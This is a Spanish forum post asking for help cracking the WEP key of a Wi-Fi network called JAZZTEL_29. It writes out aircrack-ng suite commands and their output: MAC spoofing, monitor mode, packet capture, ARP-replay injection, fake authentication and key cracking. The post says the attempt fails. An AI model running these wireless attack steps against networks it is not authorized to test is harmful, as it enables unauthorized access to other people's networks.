Hola a todos!
Yo uso Ubuntu 10.10 Maverick (Linux) ahora mismo.
Para probar la seguridad de la red uso aircrack-ng. ($ sudo apt-get install aircrack-ng)
Uso terminator para quien no lo conozca es una aplicación que te permite abrir una consola multiple que es mas cómodo(ver mi captura de pantalla)($ sudo apt-get install terminator)
OBJETIVO (para algunos facil): PONER A PRUEBA CONTRASEÑA WEP DE JAZZTEL_29
El caso es que hago en la consola:
$ iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
wlan1 IEEE 802.11bg ESSID:off/any
Mode:Managed Frequency:2.452 GHz Access Point: Not-Associated
Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:off
y vale me detecta la antenita RTL8187 tan rexula ke tengo en wlan1
Ahora podria falsear mi MAC haciendo $ macchanger -m 00:11:22:33:44:55 wlan1
((Para descargar macchanger: $ sudo apt-get install macchanger)
Me pongo en modo monitor haciendo
$ ifconfig wlan1 down
$ airmon-ng start wlan1
Se activará mon0. Pero atención! A mi me avisa de que:
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1045 avahi-daemon
1046 avahi-daemon (éstos no me pregunteis de ke coño son)
1076 NetworkManager Puede que sea el Gestor de Red de Sistema-Preferencias-Aplicaciones al inicio.
1188 wpa_supplicant y este no se igual esta relaccionados entre todos...
10342 dhclient ---------------->Iconito ondas de la barra de tareas
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
wlan1 RTL8187 rtl8187 - [phy2]
(monitor mode enabled on mon0)
Según creo los procesos que crean conflictos con la suite de aircrack-ng.
Quizas deberia cerrarlos...Pero no lo he conseguido con $ kill <Nº PID>. ni tampoco con $ kill -9 <PID>
Y ya me pongo a observar todo con haciendo:
$ sudo airodump-ng mon0
Veo todas las redes disponibles pero las intensidades estan en negativo, sera algo del controlador, cuanto menos tengo parece que es mas, no me fio mucho de ellas.Pero ahora empiezan mis problemas, no se como cambiarme de canal para capturar con airodump-ng.Intento capturar haciendo:
$ sudo aireplay-ng -3 -b 00:1A:2B:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0
17:35:27 Waiting for beacon frame (BSSID: 00:1A:xx:xx:xx:xx) on channel -1
17:35:27 mon0 is on channel -1, but the AP uses channel 11
Y me dice que esta en el canal -1 (yo flipo!) Pues pongo para intentar cambiarlo de canal
$ sudo iwconfig mon0 channel 11
No me pone error ni nada, es decir me pasa a otra linea, pero luego intento otra vez el comando anterior y me dice lo mismo, que na que esta en -1...Me cambio de canal con wlan1 desactivando el modo monitor en el primer comando, cambiando de canal en el segundo comando, volviendo a activar modo monitor en el tercero y capturando trafico con el último.
$ sudo airmon-ng stop wlan1 mon0
$ sudo iwconfig wlan1 mode monitor channel 11
$ sudo airmon-ng start wlan1
$ sudo airodump-ng -w redes -c11 wlan1
Notar que he uso interfaz wlan1 y no he podido con mon0, supongo que da igual.Me empieza a capturar trafico y lo guarda en redes-01.cap en mi carpeta personal, vale bien. Ahora intento inyectar ya que no tengo tráfico en mi red y no suben los #Data, haciendo:
$ sudo aireplay-ng -3 -b 00:1A:2B:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan1
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan1 <#>'
Sysfs injection support was not found either.
Esto supuse que es por no desactivar el iconito de las ondas. Doy click derecho y desactivar redes y ahora vuelvo a hacer:
$ sudo aireplay-ng -3 -b 00:1A:2B:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan1
Pongo wlan1 porque mon0 sigue empanao en el canal -1.Ahora empieza a "Read packets..." pero no pilla ni un ARP en mucho tiempo
Intento establecer una conexión con (otro tipo de ataque aireplay-ng)
$ sudo aireplay-ng -1 0 -e JAZZTEL_29 -a 00:1A:2B:xx:xx:xx -h xx:xx:xx:xx:xx:xx mon0
17:46:59 Waiting for beacon frame (BSSID: 00:1A:2B:xx:xx:xx) on channel 11
17:46:59 Sending Authentication Request (Open System)
17:47:01 Sending Authentication Request (Open System)
17:47:03 Sending Authentication Request (Open System)
17:47:05 Sending Authentication Request (Open System)
17:47:07 Sending Authentication Request (Open System)
17:47:09 Sending Authentication Request (Open System)
17:47:11 Sending Authentication Request (Open System)
17:47:13 Sending Authentication Request (Open System)
17:47:15 Sending Authentication Request (Open System)
17:47:17 Sending Authentication Request (Open System)
17:47:19 Sending Authentication Request (Open System)
17:47:21 Sending Authentication Request (Open System)
17:47:23 Sending Authentication Request (Open System)
17:47:25 Sending Authentication Request (Open System)
17:47:27 Sending Authentication Request (Open System)
17:47:29 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
No pone conexion establecida y menos la carita sonriente que tanto me gustaba en wifislax ;-)
Al ver que no puedo hacer subir los data con estos dos tipos de airodump-ng.Lo que hago es intentar conectarme a la red desde el icono de las ondas, ya sabeis, en el ubuntu 10.10 en la barra de tareas alado del sonido.Creo que dhclient se llama ese programa predeterminado.
Click en el icono y pongo cualquier contraseña en la red objetivo y habiendo dejado abierto la consola del airodump que estaba capturando en redes-01.cap.Cual es mi sorpresa cuando veo que suben los datas mientras intenta conectar, sin exito claro con la contraseña incorrecta, pero no suben mucho, solo 1 cada 5 segundos o asi, y encima se intenta conectar durante 1 minuto y luego deja de intentarlo. Y lo tengo que hacer manualmente
A ese ritmo he conseguido reunir 500 datas en 1 hora o asi, pero hago un
$ aircrack-ng redes-01.cap
Selecciono el objetivo 1.Y claro con tan pocos #Datas me dice:
Aircrack-ng 1.1 [00:00:03] Tested 168013 keys (got 538 IVs) Failed. Next try with 5000 IVs
Aun asi me guardare el redes-01.cap. Para si capturo mas paquetes con otro poder hacer:
$ aircrack-ng redes-01.cap redes-02.cap
etc,,, todo junto
Se me acabaron las ideas
Yo creo que deberia hacer kill a todos los procesos que tuvieran que ver con gestión de redes en Ubuntu 10.10. Pero no se cuales son, no se cuales son en Monitor del sistema.Se os ocurre algo??¿?